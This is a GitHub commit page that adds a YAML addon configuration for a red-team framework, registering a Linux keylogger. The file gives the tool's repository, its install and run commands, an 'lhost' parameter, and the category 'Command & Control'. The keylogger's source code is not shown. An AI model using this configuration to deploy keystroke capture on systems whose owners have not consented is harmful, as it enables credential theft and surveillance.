Skip to content

Commit 919aef1

Browse files
committed
a brand new c keylogger :D
1 parent 06b7d61 commit 919aef1

1 file changed

Lines changed: 21 additions & 0 deletions

File tree

lazyaddons/keylogger.yaml

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
name: keylogger
2+
description: 'From the creators of LazyOwn Redteam Framework comes a free and open-source minimal production‑grade, low‑level keylogger for Linux systems that captures keystrokes directly from the kernel’s input subsystem (evdev). It operates as a daemon, logs every key press with microsecond precision, and supports keyboard modifiers (Shift, Ctrl, Alt, CapsLock). Designed for authorized security audits, penetration testing, system monitoring, and debugging input pipelines. This implementation is written in standard C, uses no external libraries beyond the GNU C library, and runs on any Linux kernel ≥ 2.6.
3+
'
4+
author: LazyOwn RedTeam
5+
version: '1.0'
6+
enabled: true
7+
params:
8+
- name: lhost
9+
type: string
10+
required: true
11+
description: lhost target.
12+
os: any
13+
trigger: []
14+
tool:
15+
name: keylogger
16+
repo_url: https://github.com/grisuno/keylogger.git
17+
install_path: external/.exploit/keylogger
18+
install_command: ./install.sh ; ./configure ; make ; make install
19+
execute_command: git restore . ; git pull ; chmod +x *.sh && make run
20+
download_file: /tmp/keylogger.pid
21+
category: 10. Command & Control

0 commit comments

Comments
 (0)